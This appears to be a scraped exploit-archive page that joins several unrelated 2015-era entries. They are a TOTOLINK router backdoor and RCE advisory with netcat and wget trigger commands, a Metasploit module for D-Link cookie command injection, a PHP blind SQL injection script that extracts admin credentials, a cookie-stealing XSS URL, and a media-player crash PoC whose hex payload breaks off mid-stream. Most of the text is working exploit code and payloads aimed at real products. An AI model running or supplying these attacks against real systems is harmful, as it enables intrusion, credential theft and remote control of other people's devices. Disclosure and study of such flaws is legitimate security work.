Pierre Kim (@PierreKimSec). ## Greetings Big thanks to Alexandre Torres. ## References https://pierrekim.github.io/advisories/2015-totolink-0x01.txt ## Disclaimer This advisory is licensed under a Creative Commons Attribution Non-Commercial Share-Alike 3.0 License: http://creativecommons.org/licenses/by-nc-sa/3.0/
HireHackking
## Advisory Information Title: Backdoor and RCE found in 8 TOTOLINK router models Advisory URL: https://pierrekim.github.io/advisories/2015-totolink-0x02.txt Blog URL: https://pierrekim.github.io/blog/2015-07-16-backdoor-and-RCE-found-in-8-TOTOLINK-products.html Date published: 2015-07-16 Vendors contacted: None Release mode: 0days, Released CVE: no current CVE ## Product Description TOTOLINK is a brother brand of ipTime which wins over 80% of SOHO markets in South Korea. TOTOLINK produces routers routers, wifi access points and network devices. Their products are sold worldwide. ## Vulnerabilities Summary A backdoor is present in several TOTOLINK products. This was confirmed by analysing the latest firmwares and by testing the backdoor against live routers. At least 8 TOTOLINK products are affected (firmwares come from totolink.net and from totolink.cn): - A850R-V1 : until last firwmware TOTOLINK-A850R-V1.0.1-B20150707.1612.web - F1-V2 : until last firmware F1-V2.1.1-B20150708.1646.web - F2-V1 : until last firmware F2-V2.1.0-B20150320.1611.web - N150RT-V2 : until last firmware TOTOLINK-N150RT-V2.1.1-B20150708.1548.web - N151RT-V2 : until last firmware TOTOLINK-N151RT-V2.1.1-B20150708.1559.web - N300RH-V2 : until last firmware TOTOLINK-N300RH-V2.0.1-B20150708.1625.web - N300RH-V3 : until last firmware TOTOLINK-N300RH-V3.0.0-B20150331.0858.web - N300RT-V2 : until last firmware TOTOLINK-N300RT-V2.1.1-B20150708.1613.web By sending a crafted request to the WAN IP, an attacker will open the HTTP remote management interface on the Internet. Then an attacker can use a Remote Code Execution in the HTTP remote management interface by using the hidden /boafrm/formSysCmd form, bypassing the authentication system. We estimate there are =~ 50 000 routers affected by this backdoor. ## Details - backdoor The init.d script executes the /bin/skt binary when the router starts: cat etc/init.d/rcS [...] # start web server boa skt& skt is a small MIPS binary which is a client/server program. The arguments are: server: ./skt client: ./skt host cmd The binary can be used in x86_64 machines using QEMU: sudo chroot . ./qemu-mips-static ./bin/skt Using skt without argument will launch a TCP daemon on port 5555 in every interface (including WAN), acting as an ECHO server. Using skt with arguments will send a TCP packet containing the command to the specified IP on port 5555. The analysis of the binary running on the TOTOLINK devices (for more details, read https://pierrekim.github.io/blog/2015-07-XX-backdoor-in-TOTOLINK-products.html ) shows the server mode responds to 3 commands by silently executing system() in the background: o By sending "hel,xasf" to the device, the device will execute: iptables -I INPUT -p tcp --dport 80 -i eth1 -j ACCEPT This will open the HTTP remote management interface on port 80 in the eth1 interface which is the WAN interface by default. o By sending "oki,xasf" to the device, the device will execute: iptables -D INPUT -p tcp --dport 80 -i eth1 -j ACCEPT This will close the HTTP remote management interface. o By sending "bye,xasf" to the device, the device will do nothing The iptables commands in the backdoor are hardcoded with "eth1". Only devices using DHCP and static IP connections are affected because the WAN IP is attached on the eth1 device. It does not affect devices using PPPoE connections, because the WAN IP is attached on the ppp device, as seen below: totolink# ifconfig ppp0 Link encap:Point-to-Point Protocol inet addr:X.X.X.X P-t-P:X.X.X.X Mask:255.255.255.255 UP POINTOPOINT RUNNING NOARP MULTICAST MTU:1438 Metric:1 RX packets:17308398 errors:0 dropped:0 overruns:0 frame:0 TX packets:2605290 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:64 RX bytes:2803138455 (2.6 GiB) TX bytes:277402492 (264.5 MiB) An attacker can use these simple netcat commands to test the backdoor: To open the HTTP remote management interface on the Internet: echo -ne "hel,xasf" | nc <ip> 5555 To close the HTTP remote management interface on the Internet: echo -ne "oki,xasf" | nc <ip> 5555 To detect a vulnerable router: echo -ne "GET / HTTP/1.1" | nc <ip> 5555 if you see "GET / HTTP/1.1" in the answer, you likely detected a vulnerable router. ## Details - RCE in the management interface A hidden form in the latest firmware allows an attacker to execute commands as root by sending a HTTP request: POST /boafrm/formSysCmd HTTP/1.1 sysCmd=<cmd>&apply=Apply&msg= An attacker can use wget to execute commands in the remote device: wget --post-data='sysCmd=<cmd>&apply=Apply&msg=' http://ip//boafrm/formSysCmd For instance, sending this HTTP request to the management interface will reboot the device: POST /boafrm/formSysCmd HTTP/1.1 sysCmd=reboot&apply=Apply&msg= This wget command will do the same job: wget --post-data='sysCmd=reboot&apply=Apply&msg=' http://ip//boafrm/formSysCmd ## Vendor Response TOTOLINK was not contacted in regard of this case. ## Report Timeline * Jun 25, 2015: Backdoor found by analysing TOTOLINK firmwares. * Jun 26, 2015: Working PoCs with RCE. * Jul 13, 2015: Updated firmwares confirmed vulnerable. * Jul 16, 2015: A public advisory is sent to security mailing lists. ## Credit These vulnerabilities were found by Alexandre Torres and Pierre Kim (@PierreKimSec). ## References https://pierrekim.github.io/advisories/2015-totolink-0x02.txt https://pierrekim.github.io/blog/2015-07-16-backdoor-and-RCE-found-in-8-TOTOLINK-products.html ## Disclaimer This advisory is licensed under a Creative Commons Attribution Non-Commercial Share-Alike 3.0 License: http://creativecommons.org/licenses/by-nc-sa/3.0/
HireHackking

D-Link Devices - Cookie Command Execution (Metasploit)

HACKER · %s · %s

## # This module requires Metasploit: http://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## require 'msf/core' class Metasploit3 < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpClient include Msf::Exploit::CmdStager def initialize(info = {}) super(update_info(info, 'Name' => 'D-Link Cookie Command Execution', 'Description' => %q{ This module exploits an anonymous remote upload and code execution vulnerability on different D-Link devices. The vulnerability is a command injection in the cookie handling process of the lighttpd web server when handling specially crafted cookie values. This module has been successfully tested on D-Link DSP-W110A1_FW105B01 in emulated environment. }, 'Author' => [ 'Peter Adkins <peter.adkins[at]kernelpicnic.net>', # vulnerability discovery and initial PoC 'Michael Messner <devnull[at]s3cur1ty.de>' # Metasploit module ], 'License' => MSF_LICENSE, 'Platform' => 'linux', 'References' => [ ['URL', 'https://github.com/darkarnium/secpub/tree/master/D-Link/DSP-W110'] # blog post including PoC ], 'DisclosureDate' => 'Jun 12 2015', 'Payload' => { 'DisableNops' => true }, 'Targets' => [ [ 'MIPS Little Endian', # unknown if there are LE devices out there ... but in case we have a target { 'Platform' => 'linux', 'Arch' => ARCH_MIPSLE } ], [ 'MIPS Big Endian', { 'Platform' => 'linux', 'Arch' => ARCH_MIPSBE } ] ], 'DefaultTarget' => 1 )) end def check begin res = send_request_cgi({ 'uri' => '/', 'method' => 'GET' }) if res && res.headers["Server"] =~ /lighttpd\/1\.4\.34/ return Exploit::CheckCode::Detected end rescue ::Rex::ConnectionError return Exploit::CheckCode::Unknown end Exploit::CheckCode::Unknown end def exploit print_status("#{peer} - Trying to access the device ...") unless check == Exploit::CheckCode::Detected fail_with(Failure::Unknown, "#{peer} - Failed to access the vulnerable device") end print_status("#{peer} - Uploading stager ...") @counter = 1 execute_cmdstager( :flavor => :echo, :linemax => 95 # limited by our upload, larger payloads crash the web server ) print_status("#{peer} - creating payload and executing it ...") (1 .. @counter).each do |act_file| # the http server blocks access to our files ... we copy it to a new one # the length of our command is restricted to 19 characters cmd = "cp /t*/#{act_file} /tmp/#{act_file+@counter}" execute_final_command(cmd) cmd = "chmod +x /tmp/#{act_file+@counter}" execute_final_command(cmd) cmd = "/tmp/#{act_file+@counter}" execute_final_command(cmd) cmd = "rm /tmp/#{act_file}" execute_final_command(cmd) cmd = "rm /tmp/#{act_file+@counter}" execute_final_command(cmd) end end def execute_command(cmd,opts) # upload our stager to a shell script # upload takes quite long because there is no response from the web server file_upload = "#!/bin/sh\n" file_upload << cmd << "\n" post_data = Rex::MIME::Message.new post_data.add_part(file_upload, nil, "binary", "form-data; name=\"#{rand_text_alpha(4)}\"; filename=\"#{@counter}\"") post_data.bound = "-#{rand_text_alpha(12)}--" file = post_data.to_s @counter = @counter + 1 begin send_request_cgi({ 'method' => 'POST', 'uri' => "/web_cgi.cgi", 'vars_get' => { '&request' =>'UploadFile', 'path' => '/tmp/' }, 'encode_params' => false, 'ctype' => "multipart/form-data; boundary=#{post_data.bound}", 'data' => file }) rescue ::Rex::ConnectionError fail_with(Failure::Unreachable, "#{peer} - Failed to connect to the web server") end end def execute_final_command(cmd) # very limited space - larger commands crash the webserver fail_with(Failure::Unknown, "#{peer} - Generated command for injection is too long") if cmd.length > 18 begin send_request_cgi({ 'method' => 'GET', 'uri' => "/", 'cookie' => "i=`#{cmd}`" }, 5) rescue ::Rex::ConnectionError fail_with(Failure::Unreachable, "#{peer} - Failed to connect to the web server") end end end
HireHackking

AraDown - 'id' SQL Injection

HACKER · %s · %s

source: https://www.securityfocus.com/bid/54891/info AraDown is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. A successful exploit may allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. <?php echo " _____ _ _ _____ _____ _______ / ___| | | | | / _ \ / ___/|__ __| | | _ | |__| | | | | | | |___ | | | | | | | __ | | | | | \___ \ | | | |_| | | | | | | |_| | ___| | | | \_____/ |_| |_| \_____/ /_____/ |_| ____ _ _____ _____ _____ ___ ___ | _ \ | | / _ \ / _ \ | _ \ \ \ / / | |_) | | | | | | | | | | | | | | \ \ \/ / | _ ( | | | | | | | | | | | | | | \ / | |_) | | |___ | |_| | | |_| | | |_| / | | |____/ |_____| \_____/ \_____/ |_____/ |__| [*]-----------------------------------------------------------------------[*] # Exploit Title : ArDown (All Version) <- Remote Blind SQL Injection # Google Dork : 'powered by AraDown' # Date : 08/07/2012 # Exploit Author : G-B # Email : g22b@hotmail.com # Software Link : http://aradown.info/ # Version : All Version [*]-----------------------------------------------------------------------[*] [*] Target -> "; $target = stdin(); $ar = array('1','2','3','4','5','6','7','8','9','0','a','b','c','d','e','f','g','h','i','j','k','l','m','n','o','p','q','r','s','t','u','v','w','x','y','z'); echo "[*] Username : "; for($i=1;$i<=30;$i++){ foreach($ar as $char){ $b = send('http://server',"3' and (select substr(username,$i,1) from aradown_admin)='$char' # "); if(eregi('<span class="on_img" align="center"></span>',$b) && $char == 'z'){ $i = 50; break; } if(eregi('<span class="on_img" align="center"></span>',$b)) continue; echo $char; break; } } echo "\n[*] Password : "; for($i=1;$i<=32;$i++){ foreach($ar as $char){ $b = send('http://server',"3' and (select substr(password,$i,1) from aradown_admin)='$char' # "); if(eregi('<span class="on_img" align="center"></span>',$b)) continue; echo $char; break; } } function send($target,$query){ $ch = curl_init(); curl_setopt($ch,CURLOPT_URL,"$target/ajax_like.php"); curl_setopt($ch,CURLOPT_POST,true); curl_setopt($ch,CURLOPT_POSTFIELDS,array('id'=>$query)); curl_setopt($ch,CURLOPT_RETURNTRANSFER,true); $r = curl_exec($ch); curl_close($ch); return $r; } function stdin(){ $fp = fopen("php://stdin","r"); $line = trim(fgets($fp)); fclose($fp); return $line; } ?>
HireHackking

phpList 2.10.18 - 'unconfirmed' Cross-Site Scripting

HACKER · %s · %s

source: https://www.securityfocus.com/bid/54887/info PHPList is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input. An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and launch other attacks. PHPList 2.10.18 is vulnerable; other versions may also be affected. http://www.example.com/admin/?page=user&find=1&unconfirmed=%22%3 %3Cscript%3Ealert%28document.cookie%29;%3C/s cript%3E
HireHackking

Full Player 8.2.1 - Memory Corruption (PoC)

HACKER · %s · %s

#!/usr/bin/python #[+] Author: SATHISH ARTHAR #[+] Exploit Title: Full Player 8.2.1 Memory Corruption PoC #[+] Date: 13-07-2015 #[+] Category: DoS/PoC #[+] Tested on: WinXp/Windows 7 #[+] Vendor: http://www.fplayer.net #[+] Download: http://www.fplayer.net/full_player.exe #[+] Sites: sathisharthars.wordpress.com #[+] Twitter: @sathisharthars #[+] Thanks: offensive security (@offsectraining) import os os.system("color 02") print"###########################################################" print"# Title: Full Player-8.2.1 Memory Corruption PoC #" print"# Author: SATHISH ARTHAR #" print"# Category: DoS/PoC # " print"###########################################################" crash=("\x4F\x67\x67\x53\x00\x02\x00\x00\x00\x00\x00\x00\x00\x00\x55\x0B\x00\x00\x00\x00\x00\x00\xC7\x72\x7C\x6F\x01\x1E\x01\x76\x6F\x72\x62\x69\x73\x00\x00\x00\x00\x05\x99\xAC\x00\x00\xFD\xFF\xCF\xFC\x09\xFF\x99\x0F\xF9\x0F\x8F\x7F\xB9\x01\x4F\x67\x67\x53\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x55\x0B\x00\x00\x01\x00\x00\x00\x15\x5A\x7E\x0C\x11\x4A\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\x03\x76\x6F\x72\x62\x69\x73\x00\x00\x00\x00\x58\x69\x70\x68\x2E\x4F\x72\x67\x20\x6C\x69\x62\x56\x6F\x72\x62\x69\x73\x20\x49\x20\x32\x30\x30\x32\x30\x37\x31\x37\x01\x00\x00\x00\x19\x00\x00\x00\x53\x6F\x6E\x79\x20\x4F\x67\x67\x20\x56\x6F\x72\x62\x69\x73\x20\x31\x2E\x30\x20\x46\x69\x6E\x61\x6C\x01\x05\x76\x6F\x72\x62\x69\x73\x29\x42\x43\x56\x01\x00\x08\x00\x00\x80\x22\x4C\x20\xC3\x80\xD0\x90\x55\x00\x00\x10\x00\x00\x80\xA8\x36\x14\x6B\xA9\xB1\xD6\x1A\x63\xA1\x28\x46\xD4\x62\x6A\x31\xC6\x18\x63\xE3\x2C\x46\x90\x62\x8B\x31\xC6\x18\x63\x8C\x31\xC6\x18\x63\x8C\x31\xC6\x18\x63\x20\x34\x64\x15\x00\x00\x04\x00\x40\x31\xEA\x15\x93\x9E\x42\xCC\x39\xE7\xDC\x18\xA6\x8D\x51\xDA\x29\xC7\x39\xE7\xDC\x18\xC5\x89\x30\x58\x21\xA5\xB9\xA5\x9A\x52\xCC\xA1\x93\x9C\x4A\xCA\x39\xE7\x1C\x08\x0D\x59\x05\x00\x00\x02\x00\x40\x48\x21\x85\x14\x52\x48\x21\x85\x14\x52\x48\x21\x85\x14\x52\x4A\x29\xA5\x94\x62\x8A\x29\xA6\x98\x62\x8A\x29\xA6\x98\x72\xCC\x31\xC7\x1C\x83\x0C\x32\xE8\xA4\x93\x4E\x3A\xE9\x24\xA4\x90\x42\x09\xA5\xA4\x92\x52\x4A\xAD\xC5\x1A\x6B\xEF\xBD\xF7\x9E\x7B\xEF\xBD\xF7\xDE\x7B\xEF\xBD\xF7\xDE\x7B\xEF\xBD\xF7\xDE\x7B\xCF\x39\x07\x42\x43\x56\x01\x00\x20\x00\x00\x04\x42\x06\x21\x84\x10\x42\x08\x21\x84\x14\x52\x48\x21\xA6\x98\x62\xCA\x29\xA7\x80\xD0\x90\x55\x00\x00\x20\x00\x80\x00\x00\x00\x00\x4B\xB1\x14\x4D\xD1\x1C\xCF\xF1\x1C\xCF\x11\x1D\x53\x12\x25\x53\x32\x25\x53\x72\x2D\xD7\x32\x2D\x53\x33\x3D\xD3\x33\x45\x55\x74\x55\x53\x55\x65\xD7\x75\x65\x53\x36\x65\x53\x36\x65\x55\x36\x65\x53\x36\x65\x53\x36\x65\xD5\x95\x65\x59\x96\x65\x59\x96\x65\x59\x96\x65\x59\x96\x65\x59\x96\x65\x20\x34\x64\x15\x00\x20\x01\x00\xA0\x23\x39\x92\x23\x29\x8E\xE2\x38\x8E\xE3\x48\x92\x04\x84\x86\xAC\x02\x00\x64\x00\x00\x04\x00\x60\x28\x8A\xA3\x48\x8E\x24\x59\x92\x65\x59\x96\x67\x99\x9A\xE9\x99\x9E\x69\x9A\xA6\x69\x9A\xA6\x09\x84\x86\xAC\x02\x00\x00\x01\x00\x04\x00\x00\x00\x00\x00\xA0\x69\x9A\xA6\x69\x9A\xA6\x69\x9A\xA6\x69\x9A\xA6\x69\x9A\xA6\x69\x9A\xA6\x69\x9A\x66\x59\x96\x65\x59\x96\x65\x59\x96\x65\x59\x96\x65\x59\x96\x65\x59\x96\x65\x59\x96\x65\x59\x96\x65\x59\x96\x65\x59\x96\x65\x59\x96\x65\x59\x96\x65\x59\x40\x68\xC8\x2A\x00\x40\x02\x00\x40\xC7\x71\x1C\xC7\x71\x1C\xC7\x71\x1C\x47\x72\x24\x07\x08\x0D\x59\x05\x00\xC8\x00\x00\x08\x00\x40\x52\x24\xC5\x72\x34\x47\x73\x34\xC7\x73\x3C\x47\x74\x44\x47\x94\x4C\x49\x95\x5C\x4B\xB6\x64\x0D\x08\x0D\x59\x05\x00\x00\x02\x00\x08\x00\x00\x00\x00\x00\x40\x33\x2C\x43\x53\x3C\x47\xB3\x44\x4D\xD4\x44\x51\xF4\x44\x4F\x14\x45\xD1\xF3\x3C\xCF\xF3\x3C\xCF\xF3\x3C\xCF\xF3\x3C\xCF\xF3\x3C\xCF\xF3\x3C\xCF\xF3\x3C\xCF\xF3\x3C\xCF\xF3\x3C\xCF\xF3\x3C\xCF\xF3\x3C\xCF\xF3\x3C\xCF\xF3\x3C\xCF\xF3\x80\xD0\x90\x55\x00\x00\x04\x00\x00\x01\x9D\x66\x98\x6A\x80\x08\x33\x92\x59\x20\x34\x64\x15\x00\x80\x00\x00\x00\x10\x81\x0C\x53\x0C\x08\x0D\x59\x05\x00\x00\x04\x00\x00\x48\x91\xE4\x24\x89\x92\x93\x52\x4A\x39\x0C\x92\xC5\x24\xA9\x94\x93\x52\x4A\x79\x14\x93\x47\x35\xC9\x18\x94\x52\x4A\x29\xA5\x94\x52\x4A\x29\xA5\x94\x52\x4A\x29\x0C\x92\xE5\x28\xA9\x94\x93\x52\x4A\x49\x8C\x92\xC5\x28\xA9\x52\x93\x52\x4A\x79\x94\x93\x27\x35\xC9\xD8\x93\x52\x4A\x29\xA5\x94\x52\x4A\x29\xA5\x94\x52\x4A\x59\x90\x92\x27\x2D\xE9\x1A\x94\x52\x4A\x49\x8E\x92\x06\x2D\xD9\xD4\x93\x52\x4A\x89\x52\x94\x28\x39\xD9\x9E\x94\x52\x4A\x29\xA5\x94\x52\x4A\x29\xA5\x94\x52\x4A\xF9\xA0\x94\x0F\x42\x29\xA5\x94\x52\x4A\xB9\xDA\x93\x6B\x3D\x29\xA5\x94\x52\x4A\x19\xA3\x94\xF0\x49\x29\xA5\x94\x52\x4A\x29\xA5\x94\x52\x4A\x29\xA5\x94\x52\xCA\x08\x42\x43\x56\x01\x00\x40\x00\x00\x80\x71\xD6\x28\x87\xA2\x93\xE8\x7C\x71\x86\x72\xA6\x29\x48\x2A\x94\x26\x74\x6F\x92\xA3\xE4\x39\xC9\xAD\xB4\xDC\x9C\x6E\xC2\x39\xA7\x9B\x53\xCE\xF9\xE4\x9C\x73\x82\xD0\x90\x55\x00\x00\x20\x00\x00\x84\x10\x52\x48\x21\x85\x14\x52\x48\x21\x85\x14\x52\x88\x21\x86\x18\x72\xC8\x29\xA7\xA0\x82\x0A\x2A\xA9\xA4\xA2\x8A\x2A\xAA\xAC\xB2\xCC\x32\xCB\x2C\xB3\xCC\x32\xCB\x2C\xB3\xCC\x32\xEB\xAC\xA3\x8E\x3A\x0B\x29\x84\x92\x42\x0B\xAD\xD5\x18\x6B\x8C\xB1\xD5\xDE\x9C\xB4\x35\x47\x29\x9D\x94\x52\x4A\x29\xA5\x94\xCE\x39\xE7\x9C\x20\x34\x64\x15\x00\x00\x02\x00\x40\x20\x64\x90\x41\x06\x19\x65\x14\x52\x88\x21\xA6\x9C\x72\xCA\x29\xA8\xA4\x92\x0A\x08\x0D\x59\x05\x00\x00\x02\x00\x08\x00\x00\x00\x10\x25\xD3\x31\x1D\xD1\x11\x15\xD1\x11\x1D\xD1\x11\x1D\xD1\x11\x1D\xCF\xF1\x1C\x4F\x12\x25\xD1\xF2\x2C\x51\x33\x3D\x53\x34\x4D\xD3\x55\x65\x57\x96\x75\xD9\x96\x6D\x57\x97\x75\x5B\x97\x7D\xDB\xB7\x75\xDB\xB6\x7D\xDD\xD8\x8D\xDF\x38\x8E\xE3\x38\x8E\xE3\x38\x8E\xE3\x38\x8E\xE3\x38\x8E\x63\x08\x42\x43\x56\x01\x00\x20\x00\x00\x00\x42\x08\x21\x84\x14\x52\x48\x21\x85\x94\x62\x8A\x31\xE7\xA0\x83\x10\x42\x29\x81\xD0\x90\x55\x00\x00\x20\x00\x80\x00\x00\x00\x00\x45\x71\x14\xC7\x91\x1C\x49\x92\x24\x4B\xB2\x2C\xCD\xD2\x34\x4D\xD3\x34\x4F\xF4\x44\xCF\xF4\x54\xCF\x15\x65\xD1\x16\x6D\xCF\xF5\x6C\xD1\xF6\x5C\x4F\xF5\x54\x4F\x15\x55\x53\x35\x5D\xD3\x55\x5D\xD7\x75\x5D\xD5\x55\x65\x55\x76\x6D\xDB\xB6\x6D\xDB\xB6\x6D\xDB\xB6\x6D\xDB\xB6\x6D\xDB\xB6\x65\x20\x34\x64\x15\x00\x20\x01\x00\xA0\x23\x39\x92\x22\x29\x92\x22\x39\x8E\x23\x39\x92\x04\x84\x86\xAC\x02\x00\x64\x00\x00\x04\x00\xA0\x28\x8A\xE2\x38\x8E\xE4\x58\x92\x25\x69\x92\x28\x99\x96\x6A\xB9\x9A\xEC\xE9\x9E\x2E\xEA\xA2\x0E\x84\x86\xAC\x02\x00\x00\x01\x00\x04\x00\x00\x00\x00\x00\x60\x88\x86\x68\x88\x8E\x68\x89\x9A\x28\x8A\xA2\x28\x8A\xA2\x28\x8A\xA2\x28\x8A\xA2\x28\x8A\xA2\x28\x8A\xA2\x28\x8A\xA2\x28\x8A\xA2\x28\x8A\xA2\x28\x8A\xA2\x28\x8A\xA2\x28\x8A\xA2\x28\x8A\xA2\x28\x8A\x9E\xE7\x79\x9E\xE7\x79\x9E\xE7\x79\x40\x68\xC8\x2A\x00\x40\x02\x00\x40\x47\x72\x24\xC7\x52\x2C\x45\x52\x24\xC5\x72\x2C\x07\x08\x0D\x59\x05\x00\xC8\x00\x00\x08\x00\xC0\x31\x1C\x43\x52\x24\xC7\xB2\x2C\x4B\xD3\x34\xCF\xF3\x3C\x4F\xF4\x44\x51\x14\x45\xD3\x54\x4D\x15\x08\x0D\x59\x05\x00\x00\x02\x00\x08\x00\x00\x00\x00\x00\x40\x51\x14\xCB\xB1\x1C\x49\xD2\x1C\x4F\x12\x1D\x51\x12\x25\xD1\x12\x25\x51\x13\x35\x51\x14\x45\x51\x14\x45\x51\x14\x45\x51\x14\x45\x51\x14\x45\x51\x14\x45\x51\x14\x45\x51\x14\x45\x51\x14\x45\x51\x14\x45\x51\x14\x45\x51\x14\x45\x51\x14\x81\xD0\x90\x95\x00\x00\x19\x00\x00\x03\xB1\xF5\xD4\x72\xEE\x8D\xA0\x48\x2A\x47\xB5\xC6\xD4\x51\xE6\x24\x06\x61\x1A\x8A\xA0\x82\x18\x84\x0C\x15\x44\x88\x51\x0E\x26\x62\x0A\x19\x26\x39\x97\x0C\x3A\xA6\x98\xD4\x18\x4B\x2A\x1D\x73\x52\x6B\x4B\x25\x54\x48\x41\x0C\x36\xA6\x52\x29\xE5\xA8\x07\x42\x43\x56\x08\x00\xA1\x19\x00\x0E\xC7\x01\x24\xCD\x02\x24\x4B\x03\x00\x00\x00\x00\x00\x00\x00\x49\xD3\x00\xCD\xF3\x00\xCD\xF3\x00\x00\x00\x00\x00\x00\x00\x40\xD2\x34\xC0\xF2\x3C\x40\xF3\x3C\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x1C\x4D\x03\x34\xD1\x03\x34\xCF\x03\x00\x00\x00\x00\x00\x00\x00\x4D\xF4\x00\x4F\x34\x01\x4F\x14\x01\x00\x00\x00\x00\x00\x00\xC0\xF2\x3C\xC0\x33\x3D\xC0\x13\x4D\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x1C\x4D\x03\x34\xCF\x03\x34\xCF\x03\x00\x00\x00\x00\x00\x00\x00\xCB\xF3\x00\xCF\x14\x01\xCF\x33\x01\x00\x00\x00\x00\x00\x00\x40\xF3\x44\xC0\x13\x45\xC0\x33\x45\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x01\x0E\x00\x00\x01\x16\x42\xA1\x21\x2B\x02\x80\x38\x01\x00\x87\x24\x41\x92\x20\x49\xD0\x34\x80\x64\x59\xF0\x34\x68\x1A\x4C\x13\x20\x59\x16\x34\x0D\x9A\x06\xD3\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x40\xD2\x34\x68\x1A\x34\x0D\xA2\x08\x90\x34\x0D\x9A\x06\x4D\x83\x28\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x20\x79\x1A\x34\x0D\x9A\x06\x51\x04\x48\x9A\x07\x4D\x83\xA6\x41\x14\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\xD0\x4C\x13\xA2\x08\x51\x84\x69\x02\x34\xD3\x84\x28\x42\x14\x61\x9A\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00\x80\x01\x07\x00\x80\x00\x13\xCA\x40\xA1\x21\x2B\x02\x80\x38\x01\x00\x87\xE2\x58\x16\x00\x00\x38\x92\x63\x59\x00\x00\xE0\x38\x8E\x65\x01\x00\x80\x65\x59\x9A\x06\x00\x00\x96\x65\x69\x1A\x00\x00\x00\x00\x00\x00\x00\